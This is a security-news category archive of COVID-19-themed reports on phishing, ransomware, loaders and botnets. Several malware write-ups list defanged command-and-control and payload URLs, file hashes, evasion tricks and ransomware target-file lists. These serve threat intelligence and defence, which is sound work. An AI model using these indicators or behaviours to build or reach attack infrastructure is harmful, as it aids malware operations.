Category Archives: coronavirus

Not all IT budgets are being cut, some are increasing

At a high level—and contrary to conventional wisdom – not all IT budgets are being cut. Even with the economic challenges that COVID-19 has posed for businesses, almost 38 percent of enterprises are keeping their IT budgets unchanged (flat) or actually increasing them. Yellowbrick Data received responses from more than 1,000 enterprise IT managers and executives, uncovering their infrastructure priorities during this era of economic uncertainty and disruption. “The survey brought to light some trends … More

The post Not all IT budgets are being cut, some are increasing appeared first on Help Net Security.

Facebook to verify identities on accounts that churn out viral posts

Hopefully it's a COVID-19 version of what it did post-2016 elections, when it required verification of those buying political or issue ads.

Apparently Coronavirus-tracing scammers won’t sound professional… (Yeah, right!)

Some members of the UK public will soon start receiving text messages and emails claiming to come from the NHS Test and Trace Service, as part of the country’s fight against the Coronavirus pandemic.

The problem is that many of them won’t know if the communication is genuine, or from a scammer.

And the UK Government’s advice isn’t helping.

Agile security helps software teams deliver quicker and better software

Agile adoption improves key capabilities needed to respond to current business challenges, especially those resulting from the pandemic, according to Digital.ai. With 60 percent of survey respondents saying Agile has helped increase speed to market, 41 percent agreeing they are better able to manage distributed teams, and 58 percent saying they have improved team productivity it is clear these practices are invaluable during these challenging times. “Our all-in move to the cloud in recent years … More

The post Agile security helps software teams deliver quicker and better software appeared first on Help Net Security.

41% of organizations have not taken any steps to expand secure access for the remote workforce

Currently, organizations are struggling to adjust to the new normal amidst the COVID-19 pandemic, a Bitglass survey reveals. 41% have not taken any steps to expand secure access for the remote workforce, and 50% are citing proper equipment as the biggest impediment to doing so. Consequently, 65% of organizations now enable personal devices to access managed applications. Remote work and secure access concerns When asked what their organizations are primarily concerned with securing while employees … More

The post 41% of organizations have not taken any steps to expand secure access for the remote workforce appeared first on Help Net Security.

Coronavirus-themed attacks May 24 – May 30, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 24 to May 30, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide, experts are observing new campaigns on a daily bases.

Below a list of attacks detected this week.

May 26 – Hangzhou could permanently adopt COVID-19 contact-tracing app

The City of Hangzhou is planning to make a contact tracing system developed to fight the COVID-19 pandemic permanent for its citizens.

May 27 – Fuckunicorn ransomware targets Italy in COVID-19 lures

A new piece of ransomware dubbed FuckUnicorn it targeting Italy by tricking victims into downloading a fake COVID-19 contact tracing app.

May 29 – Himera and AbSent-Loader Leverage Covid19 lures

Researchers at ZLab spotted a new phishing campaign using Covid19 lures to spread Himera and Absent-Loader.  

May 30 – A new COVID-19-themed campaign targets Italian users

Security researchers uncovered a new COVID-19-themed campaign targeting users of the National Institute for Social Security (INPS).

If you are interested in COVID19-themed attacks from February 1 give a look at the following posts:

If you are interested in COVID19-themed attacks from February 1 give a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, Coronavirus themed campaigns)

The post Coronavirus-themed attacks May 24 – May 30, 2020 appeared first on Security Affairs.

A new COVID-19-themed campaign targets Italian users

Security researchers uncovered a new COVID-19-themed campaign targeting users of the National Institute for Social Security (INPS).

Security experts from D3Lab have uncovered a new COVID-19-themed phishing campaign that is targeting the users of the Italian National Institute for Social Security (INPS). Like a previous campaign observed in early April, threat actors set up a fake INPS site used (“inps-it[.]top”) to trick victims into downloading a malicious app.

“A new Phishing campaign against INPS users , similar to the previous one of April 6, 2020 , has been detected in the past few hours by our research and analysis center for Phishing campaigns.” reads the post published D3Lab.

“The fraudulent activity is carried out through a web domain created Ad Hoc with similarities, in the name, to the official one of the national social security institution with the intent to download malware to users interested in receiving the Covid-19 allowance allocated from the Italian state.”

COVID-19 campaign INPS
COVID-19 campaign INPS

D3Lab reported its findings to the Italian CERT-AGID that published a security advisory.

Cybercriminals are attempting to take advantage of the Covid-19 indemnity that the Italian government will give to some Italian citizens with specific requirements.

The citizens have to request the Covid-19 indemnity to the goverment through the INPS portal, for this reason, threat actors set up a fake INPS site asking people to download a phantom “application for the new COVID-19 indemnity” which actually returns a malicious APK for Android devices..

The malicious APT, named “acrobatreader.apk,” is a Trojan-Banker malware that is able to monitor the actions performed by the user.

The malware asks users to enable the accessibility service in order to take advantage of the legitimate functions of this service and achieve wider access to the system APIs to communicate with other apps on the device.

“As soon as the presence of connectivity is detected, an HTTP POST request is sent to C2 through the following url ” http: // greedyduck [.] Top / gate [.] Php ” passing two parameters:

  • ” Action “: with botcheck or injcheck values ;
  • ” Data “: information collected and passed in encrypted form (RC4).”

The CERT-AGID published the Indicators of Compromise (IoCs) here.

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post A new COVID-19-themed campaign targets Italian users appeared first on Security Affairs.

Himera and AbSent-Loader Leverage Covid19 Themes

Researchers at ZLab spotted a new phishing campaign using Covid19 lures to spread Himera and Absent-Loader.  

Introduction

During our Cyber Defense monitoring activities we intercepted waves of incoming emails directed to many companies under our protective umbrella. These messages were leveraging FMLA (Family and Medical Leave Act) requests related to the ongoing COVID19 pandemics. These emails were weaponized with two versatile cyber-criminal tools: Himera and Absent-Loader.  

Figure1: Email vector example

Loaders are a type of malicious code specialized in loading additional malware code into the victim’s machine. Sometimes, a loader can assume “stealer” behavior, to opportunistically gatherer sensitive information even if they are not supposed to do that. Absent-Loader does that and despite its name behaves this way. In fact, stolen information market is definitely remunerative for cyber criminals: information gathered from infected systems are constantly sell in the underground, typically acquired by other, more structured criminal organization or also by business competitors.

Technical Analysis  

The sample used in this campaign first uses word document which refers to an executable, then it drops another executable and does a renaming operations to evade controls. The following picture reports the infection chain used in this campaign:

Figure 2: Infection Chain

The malicious email wave contained a .doc attachment. Following, the static information of this file:

NameCovid-19-PESANTATION.doc
Hash97FA1F66BD2B2F8A34AAFE5A374996F8
ThreatHimera Loader dropper
Size95,4 KB (97.745 byte)
FiletypeMicrosoft Word document 
Ssdeep1536:7fVmPSiRO8cOV8xCcoHrZvIdTZ2DSXMqcI3iL5PEs8VlbeH0btGDYLlNq2l+SEg:7fVz8zyUHlvId7H3iL5MVlbeHGkQvqTU

Table 1: Static information about the Malicious document

The interesting feature of this document is the fact that it does not leverage any type of macro or exploit, but it contains the entire executable within it as an embedded object. So, the user is led to double-click on the malicious icon, representing the executable. 

Thus, once clicked, it allows this malicious document to execute a malicious file named HimeraLoader.exe.

NameHimeraLoader.exe
Hash4620C79333CE19E62EFD2ADC5173B99A
ThreatSecond stage dropper
Size143 KB (146.944 byte)
FiletypeExecutable
File InfoMicrosoft Visual C++ 8
Ssdeep3072:jqW9iAayyenylzx0/2gJUSUZsnOA/TtYLeEoWj5PxJhQQeSH1pNGmHohurCMSiBf:jqW9iAayyenylzx0/2gJUSUZsnJ/TKLd

Table 2: Static information about the HimeraLoader executable

Inspecting the HimeraLoader.exe trace we noticed a really characteristic mutex created during the initial loading of the malicious code: the “HimeraLoader v1.6” mutex, or Mutant.

Figure 3: Himera Loader Mutex

Also, the sample performs some classic anti-analysis tricks using Windows API such as “IsDebbugerPresent”, “IsProcessorFeaturePresent” and “GetStartupInfoW”. The execution will take different paths in the program’s flow if the debugger is present. The function GetStartupInfoW retrieves the contents of the STARTUPINFO structure that was specified when the calling process was created. This function takes as parameter a pointer to a STARTUPINFO structure that receives the startup information and does not return a value.

Figure 4: Relevant strings of the Loader

When the Himera Loader goes through its execution and passes all anti-analysis tricks, it gathers another binary from http:]//195.]2.]92.]151/ad/da/drop/smss.]exe . The remote server is operated by Hosting Technologies LLC, a company running the Russian hosting service brand “VDSina.ru”. 

The AbSent-Loader 

The file downloaded from the dropurl has the following static information:

Namesmss[1].exe
Hash4D2207059FE853399C8F2140E63C58E3
ThreatDropper/Injector
Size0,99 MB (1.047.040 byte)
FiletypeExecutable
File InfoMicrosoft Visual C++ 8
Ssdeep24576:+9d+UObalbls+rcaN+cFsyQIDHx2JrjDwc9bmfRiHwl:+9d+UObaVzrcaN+cKypDHx2Jr/wYbmJd

Table 3: Static information about the AbsentLoader Payload

When “smms.exe” is executed, it copies itself in a new file winsvchost.exe in the %TEMP% path and creates a scheduled task to maintain persistence after reboot.

Figure 5: Evidence of the Scheduled Task

Moreover, the malware adopts some interesting anti-debug techniques, like the GetTickcount one. The technique is quite similar to that one described in one of our previous report. there is immediately the subtraction of the two values and it is placed in EAX register. After the “call eax” instruction, an immediate subtraction of the first GetTickCount  API call results and this second one is executed. 

Figure 6: GetTickCount anti-debug Technique

Then, the malware establishes TCP connection every 15 minutes. These connections are directed to the same remote host operated by Hosting Technologies LLC  (195.2.92.151) but this time it sends HTTP POST requests to the “/ad/da/gate.php” resource.

Figure 7: Evidence of some relevant strings inside the payload

This payload is a new version of AbSent-Loader, a piece of malware that, despite its name, behaves also like a bot, lacking most modern advanced features but sophisticated enough to maintain persistence on the victim host and to escalate the attack with follow up malware implants. 

Conclusion

The attack we intercepted and described here is a clear example of the new threats that are approaching cyberspace during these months: new criminal threat actors with the sole objective to economically exploit the emotional reactions of the people willing to keep the economic fabric alive and running to support the Covid19 response.

In this particular period, cyberspace is getting more and more risky for companies and people, the cyber criminality raised during the lock-downs and these malicious actors are using all the possible mediums to make more money at the expense of companies and organizations. For this reason, we strongly advise companies to adapt and enhance their cyber security perimeter to resist the new volumes and types of cyber attacks we are experiencing these days.

Indicators of Compromise (IoCs) and Yara rules are available here:

Pierluigi Paganini

(SecurityAffairs – COVID19, hacking)

The post Himera and AbSent-Loader Leverage Covid19 Themes appeared first on Security Affairs.

How to protect your business from COVID-19-themed vishing attacks

Cybercriminals have been using the COVID-19 pandemic as a central theme in all kinds of crisis-related email phishing campaigns. But because of the dramatic rise of the number of at-home workers, one method that has become increasingly common over the past few months are vishing attacks, i.e., phishing campaigns executed via phone calls. Rising success rates are the reason why vishing has become more common, and there are several factors driving this trend: People are … More

The post How to protect your business from COVID-19-themed vishing attacks appeared first on Help Net Security.

Remote work and the threat landscape

Last month, after the dust had settled from the move from office to remote workwe took a look at ways you could improve your security postureIn it, we discussed how you can shore up older and personal devices now being used for work taskshow to reduce your security footprint with company-sanctioned software, and ways to ensure that connections back into the company network are secure.  

This month, we decided to take a look at some of the trends we’ve seen in shifting threat landscape, including attackers who are adapting their techniques to take advantage of new opportunitiesWhen you understand what they’re doing, it’s easier to mount a better defense against new trends in the threat landscape. 

The great migration  

Before diving into what attackers are up to, let’s take a look at just how significant the shift to remote work has beenTo do this, we took a look at traffic running through Cisco Umbrella’s DNS servers to see where it was coming from, giving us a snapshot of internet activity. In particular, we looked at distinct IP addresses, sorting them into remote and office groupings. The following chart shows the trend for the total number of IP addresses known to be remote each week. 

Figure 1 Volume of remote workers seen in Umbrella DNS traffic

In mid-March, we can see a marked increase in remote connections. While it’s interesting to note an inverse correlation between office-based connections to Umbrella (declining) and remote connections (increasing), even more interesting is by how much remote connections increased.  

Comparing the first and last weeks of March, the number of remote workers had effectively doubled. This means that IT teams have been dealing with setting up a lot of remote workers.  This can potentially spread resources thin and, given the number of new remote connections, requires attention to look out for threats in this expanded environment. (Note: new Umbrella customers who have recently signed up to our Umbrella trial have been filtered out in the above chart.) 

A topical shift in spam 

It’s not news that spammers leverage the latest big stories in their emails in order to help spread their wares. The pandemic has been no exception. As reported by Talos on a number of occasionsthreat actors have used it in a wide variety of malicious campaigns. 

Some campaigns have sent out malicious emails that appear to share government information on the pandemic, while others claim to contain information regarding government stimulus paymentsThis shift to pandemic-related campaigns is so pronounced that malicious spam campaigns focusing on package delivery have pivoted to claim that deliveries have been postponed due to the pandemic: 

Figure 2 Package delivery spam with pandemic theme

What’s interesting is not just the variety of email scams and tricks being peddled on the threat landscape, but the volume of pandemic-related spam campaigns. To determine just how much spam contained pandemic-based themes, Talos looked at distinct emails sent out that contained the terms “pandemic,” “COVID-19,” and “corona.” 

Figure 3 Percent of observed emails tracked by Talos containing pandemic themes

While emails containing these key words first began to grow in early February, there is a clear increase in mid-March, when the pandemic was constantly in the headlines and coinciding with the migration to remote work discussed above. At its peak, more than 20 percent of all email observed by Talos referenced the pandemic. (Note: the regular dips in the chart coincide with weekends. It’s also worth noting that a portion of ham or marketing emails were also mentioning the pandemic during this time.) 

Malicious domains 

In early April, researchers from Umbrella took a look at the increase in malicious domains that bad actors were leveraging to carry out attacksAccording to Umbrella researchers, on March 19th, enterprise customers connected to 47,059 domains that contain “covid or corona” in the name. Of these, four percent were blocked as malicious.  

We decided to revisit this data to see what has happened two months laterBy May 19th, this number had increased to 71,286 domains, where 34 percent of them were blocked as malicious.

Figure 4 Percentage of pandemic-related domains flagged as malicious

Despite this being a marked increase from March, late April appears to be the point where the most malicious activity took place. During this time the percentage of domains blocked as malicious frequently crossed 50 percent, even peaking as high as 75 percent. While this declined in early May, the percentage of malicious domains regularly sat between 30-40 percent in mid- to late-May.  

Protect against the trends 

Overall, bad actors have upped their activity with pandemicrelated themes surrounding malicious spam and domains. The good news is that the systems required to protect your organization from these security risks haven’t shifted much.   

For starters, Cisco Umbrella’s cloud-based services can protect users from malicious internet destinations. The malicious domains that have been registered in the last few months are all flagged as malicious within Umbrella’s DNS infrastructure, preventing users with your organizations from connecting to them and becoming compromised. 

Similarly, Cisco Email Security is well equipped to identify and filter the influx of pandemicrelated spam aimed at your user’s inboxes. The advanced phishing protections and machine learning capabilities within can quickly identify these malicious spam campaigns, not just by the topic, but by understanding and authenticating email identities and behavioral relationships, filtering out spam emails and prevent attacks. 

Also, we discussed last month, Cisco has expanded and extended trial offerings on a number of security products. Umbrella has one such offering, as does AMP for Endpoints, which can be used to secure the additional remote desktops now on the company network. AMP can help you gain visibility and control of remote devices, allowing you to see where a threat came from, where it’s been, what it’s doing, and if necessary, isolate compromised endpoints. 

Finally, to secure that remote connection back into the company network, consider using Cisco AnyConnect Secure Mobility Client with Duo Security. AnyConnect can simplify secure access to the company network, while Duo can ensure that the person logging into your network is who they say they are.  

Free and expanded offerings for Umbrella, AMP, AnyConnect, and Duo are all available through our Cisco Secure Remote Worker page. 

Enjoyed reading this Threat of the Month? Subscribe to the Threat of the Month blog series and get alerted when new blogs are published. 

The post Remote work and the threat landscape appeared first on Cisco Blogs.

Solving the security challenges of remote working

Unprecedented times call for unprecedented actions and the ongoing COVID-19 pandemic has caused what is likely to be the biggest shift towards remote working that the world has ever seen. But, while the technology has been around for quite some time, recent events demonstrate just how few businesses are capable of switching from an office-based setup to a remote one in a fast, secure, and non-disruptive manner. There’s a significant number of reasons why it … More

The post Solving the security challenges of remote working appeared first on Help Net Security.

External attacks on cloud accounts grew 630 percent from January to April

The McAfee report uncovers a correlation between the increased use of cloud services and collaboration tools, such as Cisco WebEx, Zoom, Microsoft Teams and Slack during the COVID-19 pandemic, along with an increase in cyber attacks targeting the cloud. There are significant and potentially long-lasting trends that include an increase in the use of cloud services, access from unmanaged devices and the rise of cloud-native threats. These trends emphasize the need for new security delivery … More

The post External attacks on cloud accounts grew 630 percent from January to April appeared first on Help Net Security.

Fuckunicorn ransomware targets Italy in COVID-19 lures

A new piece of ransomware dubbed FuckUnicorn it targeting Italy by tricking victims into downloading a fake COVID-19 contact tracing app.

A new ransomware dubbed FuckUnicorn has been targeting computers in Italy by tricking victims into downloading a fake contact tracing app, named Immuni, that promises to provide real-time updates for the COVID-19 outbreak.

The COVID-19-themed campaign use messages that pretend to be sent by the Italian Pharmacist Federation (FOFI).

The Italian Computer Emergency Response Team (CERT) from the AgID Agency released an advisory about this threat.

Attackers attempt to take advantage of the interest on the contact tracing app Immuni that was chosen by the Italian government to trace the evolution of the pandemic in the country.

The new ransomware was first spotted by the malware researcher JamesWT_MHT that shared samples with the malware community.

Email messages used as lure are written in Italian and informs citizens of the release of a beta release of the Immuni app for PC.

The campaign targeted pharmacies, universities, doctors, and other entities involved in the fight against COVID-19 outbreak.

To trick victims into downloading the malicious app, threat actors set up a malicious domain that clones the content of the legitimate site of the Federazione Ordini Farmacisti Italiani (FOFI.it).

The attackers registered the “fofl.it,“ domain to trick victims.

The content of the email includes download links and contact information that combines email addresses from the attacker and FOFI.

Upon executing the malware it displays a fake Coronavirus Map from the Center for Systems Science and Engineering at Johns Hopkins University.

In the background the FuckUnicorn starts encrypting data on the system, it encrypts the files in certain paths (/Desktop, /Links, /Contacts, /Documents, /Downloads, /Pictures, /Music, /OneDrive, /Saved Games, /Favorites, /Searches, and /Videos) with these extensions:

.Txt, .jar, .exe, .dat, .contact, .settings, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .jpg, .png, .csv,. py, .sql, .mdb, .sln, .php, .asp, .aspx, .html, .htm, .xml, .psd, .pdf, .dll, .c, .cs, .mp3, .mp4, .f3d, .dwg, .cpp, .zip, .rar, .mov, .rtf, .bmp, .mkv, .avi, .apk, .lnk, .iso, .7-zip, .ace, .arj, .bz2, .cab, .gzip, .lzh, .tar, .uue, .xz, .z, .001, .mpeg, .mp3, .mpg, .core, .crproj, .pdb, .ico, .pas , .db, .torrent "

The malicious code adds the “.fuckunicornhtrhrtjrjy” extensions to names of encrypted files.

The FuckUnicorn drops a ransom note written in Italian that asks victims to pay EUR 300, worth of Bitcoin, in three days or the data would be lost.

The email address in the ransom note is invalid making it impossible to send the attacker the payment proof.

At the time, there are no transactions recorded for the wallet included in the ransom note.

The good news for the victims is that CERT-AgID discovered that the password for encrypting the files is sent in clear text to the attacker, this means that it can be retrieved from the network traffic.

Pierluigi Paganini

(SecurityAffairs – FuckUnicorn, hacking)

The post Fuckunicorn ransomware targets Italy in COVID-19 lures appeared first on Security Affairs.

Patented algorithms predict, identify, diagnose and prevent abnormalities in complex systems

The COVID-19 pandemic has forced public health, supply chain, transportation, government, economic and many other entities to interact in real time. One of the challenges in large systems interacting in this way is that even tiny errors in one system can cause devastating effects across the entire system chain. Now, Purdue University innovators have come up with a possible solution: a set of patented algorithms that predict, identify, diagnose and prevent abnormalities in large and … More

The post Patented algorithms predict, identify, diagnose and prevent abnormalities in complex systems appeared first on Help Net Security.

Global DX spending to grow 10.4% in 2020

Spending on the digital transformation (DX) of business practices, products, and organizations will continue at a solid pace despite the challenges presented by the COVID-19 pandemic, IDC reveals. Global spending on DX technologies and services is forecast to grow 10.4% in 2020 to $1.3 trillion. While this is notably slower than the 17.9% growth in 2019, it remains one of the few bright spots in a year characterized by dramatic reductions in overall technology spending. … More

The post Global DX spending to grow 10.4% in 2020 appeared first on Help Net Security.

Coronavirus-themed attacks May 17 – May 23, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 17 to May 23, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide, experts are observing new campaigns on a daily bases.

Below a list of attacks detected this week.

May 19 – Hackers Target Oil Producers During COVID-19 Slump

Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers.

May 22 – Microsoft warns of “massive campaign” using COVID-19 themed emails

Experts from the Microsoft Security Intelligence team provided some details on a new “massive campaign” using COVID-19 themed emails.

May 23 – Experts observed a spike in COVID-19 related malspam emails containing GuLoader

Security experts observed a spike in the use of the GuLoader since March 2020 while investigating COVID-19-themed malspam campaigns.

If you are interested in COVID19-themed attacks from February 1 give a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Coronavirus-themed attacks May 17 – May 23, 2020 appeared first on Security Affairs.

Experts observed a spike in COVID-19 related malspam emails containing GuLoader

Security experts observed a spike in the use of the GuLoader since March 2020 while investigating COVID-19-themed malspam campaigns.

Researchers from Vipre Labs observed a spike in the use of GuLoader in COVID-19-themed campaign since March 2020.

GuLoader

The discovery confirms that crooks continue to use COVID-19 lures in malspam campaigns. In the campaign monitored by Vipre Labs, attackers used spam email samples containing GuLoader.

The GuLoader is a popular RAT that appeared in the threat landscape in 2019 and that was involved in other COVID-19 campaigns, it is written in VB5/6 and compressed in a .rar/.iso file. 

GuLoader is usually employed in spam campaigns using bill payments, wire transfers or COVID lures.

In the last campaign observed by experts, the downloader utilizes cloud hosting services to keep the payload encrypted.

“This malware downloader utilizes cloud hosting services like Microsoft OneDrive or Google Drive to keep its payload encrypted. Also, GuLoader is used to download Remote Access Trojan (RAT) or files that allow attackers to control, monitor, or steal information on the infected machine.” reads the analysis.

The malware implements anti-analysis techniques, such as an anti-debugger. In order to achieve persistence, GuLoader creates a folder in which to place a copy of itself and modifies a registry key.

Now the loader implements process hollowing and use the child processes to download, decrypt, and map the payload into memory.

Common payloads downloaded by the loader are Formbook, NetWire, Remcos, Lokibot, and others.

The analysis published by Vipre Labs includes technical details about the threats, including Indicators of Compromise (IoCs).

In early March, experts at MalwareHunterTeam uncovered a COVID-19-themed campaign that was distributing the GuLoader malware to deliver the FormBook information-stealing Trojan.

The campaign was using emails that pretend to be sent by members of the World Health Organization (WHO).

Pierluigi Paganini

(SecurityAffairs – COVID-19, malspam)

The post Experts observed a spike in COVID-19 related malspam emails containing GuLoader appeared first on Security Affairs.

Silent Night Zeus botnet available for sale in underground forums

Experts reported the existence of a botnet, tracked as Silent Night based on the Zeus banking Trojan that is available for sale in several underground forums.

This week researchers from Malwarebytes and HYAS published a report that included technical details on a recently discovered botnet, tracked as Silent Night, being distributed via the RIG exploit kit and COVID-19 malspam campaign. 

Silent Night

The source code of the Zeus Trojan is available in the cybercrime underground since 2011 allowing crooks to develop their own release since.

Experts found multiple variants in the wild, many of them belonging to the Terdot Zbot/Zloader malware family.

The name “Silent Night” Zbot is likely a reference to a weapon mentioned in the 2002 movie xXx, it was first spotted in November 2019 when a seller named “Axe” started offering it on the Russian underground forum forum.exploit[.]in.

Axe was advertising the Trojan as the result of over five years of work, a total of 15k ~ hours were spent for the development of the malicious code.

“The author described it as a banking Trojan designed with compatibility with Zeus webinjects. Yet, he claims that the code is designed all by him, based on his multiple years of experience – quote: “In general, it took me 5+ years to develop and support the bot, on average about 15k ~ hours were spent.”.” reads the report published by the researchers.

The botnet goes for $4,000 per month for a custom build, $2,000 per month for a general build, while an extra for HVNC functionality is available for 1,000 USD/month and 14 days to test the code for 500 USD.

Experts believe that Axe is the developer of the Axe Bot 1.4.1, comparing Axe Bot 1.4.1 and Zloader 1.8.0 C2 source codes, experts noted that all of their custom PHP functions have the prefix CSR, which can either be a naming space or a developer’s handle

Silent Night is able to grab information from online forms and perform web injections in major browsers, including Google Chrome, Mozilla Firefox, and Internet Explorer, monitor keystrokes, take screenshots, harvest cookies and passwords.

Silent Night leverages web injections to hijack a user’s session and redirect them to malicious domains or to grab the login credentials for online banking services. Data collected by the malware are then transferred to the operator’s command-and-control (C2) server.

The malware is able to infect all operating systems.

The seller also claims to use an original obfuscator, the decryption is performed only “on demand.” The analysis of the content of an open directory on the Command and Control server allowed the researchers to discover a manual for bot operators that includes instructions for the set up of the malware.

On Dec 23 2019, this variant of Zloader was observed being distributed by the RIG Exploit Kit, experts observed small campaigns, likely for testing purposes. The spreading intensified over time, in March 2020, it was delivered in a COVID-19-themed spam campaign using weaponized Word documents.

“The design of Silent Night is consistent and clean, the author’s experience shows throughout the code. Yet, apart from the custom obfuscator, there is not much novelty in this product. The Silent Night is not any game changer, but just yet another banking Trojan based on Zeus.” concludes the report. “Based on the analysis of the bot’s configurations, we may confidently say that there is more than one customer of the “Silent Night”.”

Pierluigi Paganini

(SecurityAffairs – Silent Night, hacking)

The post Silent Night Zeus botnet available for sale in underground forums appeared first on Security Affairs.

Microsoft warns of “massive campaign” using COVID-19 themed emails

Experts from the Microsoft Security Intelligence team provided some details on a new “massive campaign” using COVID-19 themed emails.

Researchers from the Microsoft Security Intelligence team provided some details on a new massive phishing campaign using COVID-19 themed emails.

The messages used weaponized Excel documents, the IT giant observed a spike in the number of malicious documents in malspam campaigns which use Excel 4.0 macros.

“For several months now, we’ve been seeing a steady increase in the use of malicious Excel 4.0 macros in malware campaigns. In April, these Excel 4.0 campaigns jumped on the bandwagon and started using COVID-19 themed lures.” states Microsoft in a Tweet.

The latest COVID-19 campaign began in April, the messages purport to be from the Johns Hopkins Center and use an Excel attachment. Once opened the attachment, it will show a graph of Coronavirus cases in the United States and trick the victims into enabling the macros to start the infection.

The macros drop a remote access tool (RAT) named NetSupport Manager, it is a legitimate application that is abused by attackers to take control over victim systems.

“The hundreds of unique Excel files in this campaign use highly obfuscated formulas, but all of them connect to the same URL to download the payload. NetSupport Manager is known for being abused by attackers to gain remote access to and run commands on compromised machines.” continues Microsoft.

The NetSupport RAT employed in this COVID-19-themed campaign also drops multiple components, including several .dll, .ini, and other .exe files, a VBScript, and an obfuscated PowerSploit-based PowerShell script. Then it connects to a command and control server, allowing threat actors to send further commands.

Below the Indicators of Compromise (IoCs) shared by Microsoft:

Below a list or recommendations to avoid this threat:

  • Keep your anti-virus software up to date.
  • Search for existing signs of the threat using IoCs in your environment.
  • Keep applications and operating systems running and up to date.
  • Be vigilant with attachments and links in emails.

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Microsoft warns of “massive campaign” using COVID-19 themed emails appeared first on Security Affairs.

COVID-19 is driving diverging perspectives as enterprises decide which technologies to focus on

Technology executives, C-suite leaders and senior executives in areas such as IoT, DevOps, security, and embedded development—from both the U.S. and China are realigning their focus during the COVID-19 pandemic, Wind River reveals. Seismic events can disrupt our focus and thinking and force reassessment of drivers of future business success. The current pandemic is one of those major events producing a worldwide impact, especially given its reverberations on the two largest global economies, the U.S. … More

The post COVID-19 is driving diverging perspectives as enterprises decide which technologies to focus on appeared first on Help Net Security.

Adam Levin Discusses Covid-19 Scams on CNBC

Adam Levin was featured on CNBC where he discussed how the Covid-19 pandemic has created an ideal environment for scammers.

“We are working with our children and home schooling. We’re sharing devices with our children. We’re trying to juggle work and family. But to a hacker, we are their day job,” said Levin.

The post Adam Levin Discusses Covid-19 Scams on CNBC appeared first on Adam Levin.

With the threat landscape continuously changing, businesses must be ready for anything

Despite efforts by organizations to layer up their cyber defenses, the threat landscape is changing, attackers are innovating and automating their attacks, NTT reveals. The threat landscape is changing Referencing the COVID-19 pandemic, the report highlights the challenges that businesses face as cyber criminals look to gain from the global crisis and the importance of secure-by-design and cyber-resilience. The attack data indicates that 55% of all attacks in 2019 were a combination of web-application and … More

The post With the threat landscape continuously changing, businesses must be ready for anything appeared first on Help Net Security.

Hackers Target Oil Producers During COVID-19 Slump

Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers.

Spear-phishing is a rapidly emerging threat. It’s more specific than generic phishing attempts and often targets a single person or company. Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers. 

Cybercriminals Capitalizing on the Chaos

The coronavirus is forcing companies in most industries to operate substantially differently. Many may find it takes time to adjust to the changes. Others do not immediately have the resources for a major shift, such as having all employees work remotely. 

A related concern is that COVID-19 is both a new and anxiety-inducing issue. People want to learn as much as they can about it, and their haste may result in them clicking on links without thinking. Cybercriminals view these conditions as ideal for orchestrating their attacks. Data from Barracuda cybersecurity researchers identified a 667% increase in spear-phishing attacks between the end of February and the following month. 

Real-Life Examples of Spear-Phishing Attacks in the Energy Production Sector

The threat of spear-phishing for energy companies is, unfortunately, not a theoretical one. Coverage published in late April by Bitdefender illuminated a carefully executed attack. The research team found evidence of a campaign occurring March 31, whereby hackers impersonated a well-known engineering company with experience in on- and off-shore energy projects. 

The messages — which did not include many of the telltale signs of phishing like spelling and grammatical errors — asked recipients to submit equipment and materials bids for the Rosetta Sharing Facilities Project. Participants would do so on behalf of Burullus, a gas joint venture partially owned by another Egyptian state oil brand. 

The emails also contained two attachments, which were supposedly bid-related forms. Downloading them infected a user’s system with a type of trojan spyware not previously seen in other utilities industry cyberattacks. The effort targeted oil companies all over the world, from Malaysia to South Africa, in a single day. 

Bitdefender’s research team also uncovered a more geographically specific spear-phishing attempt to target the gas sector on April 12. It centered on a relatively small number of shipping companies based in the Philippines. The emails asked them to send details associated with an oil tanker vessel and contained industry-specific language. This spear-phishing campaign occurred over two days. 

The cybersecurity experts that studied these attacks stressed that, since the messages contained accurate details about real-life companies and events associated with the oil industry, the attackers took the time to research to craft maximally convincing content. 

Hackers Love Causing Severe Disruptions

Why are cyberattacks in the energy industry suddenly on the rise? One reason may stem from the way hackers often deploy tactics to cause tremendous harm to necessary services. The oil industry operates on a vast scale. For example, a company specializing in oil and gas exploration planned as much as 300,000 feet of total footage for drilling in one region during 2018. 

The ability to get such impressive outcomes undoubtedly helps oil companies. The increased scale also may make it more necessary to safeguard against cyberattacks, especially as criminals look for ways to cause the most damage. Another recent incident, announced in a United States government alert on February 18, shut down a natural gas compression facility. Operations stopped for two days, causing losses in productivity and revenue. 

Although the publication did not name the energy company, it mentioned that the hackers depended on spear-phishing to get the credentials necessary for entering the businesses’ information technology (IT) network. It then used that access to wreak havoc on the enterprise’s operational technology infrastructure. 

Not a New Concern

Utilities industry cyberattacks have long worried cybersecurity analysts. If concentrated efforts from hackers shut down the electric grid, the effects could be long-lasting and hit virtually every industry and consumer in the affected areas. The risks to the energy sector began before the coronavirus pandemic, too. 

In November 2019, cybersecurity publications discussed a ransomware attack on Petróleos Mexicanos, Mexico’s largest oil and gas company. The perpetrators asked for 562 bitcoins to restore the data. The affected enterprise did not comply, and it had important data backed up. 

Toll Group, an Australian transportation and logistics company with oil and gas companies as clients, suffered a ransomware attack this spring. It was the second such issue in four months, with the first happening in February. 

The Energy Industry Must Remain Vigilant

The challenges posed by COVID-19 and its effect on oil prices may make the respective parties feel the impacts of cyberattacks in the energy industry more acutely. An ideal aim is to prevent those events rather than dealing with the damage afterward. Paying attention to cybersecurity vulnerabilities can help companies make meaningful gains and stay protected.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Hackers Target Oil Producers During COVID-19 Slump appeared first on Security Affairs.

Mental Health Awareness Week: Coping with cybersecurity pressures amidst a global pandemic

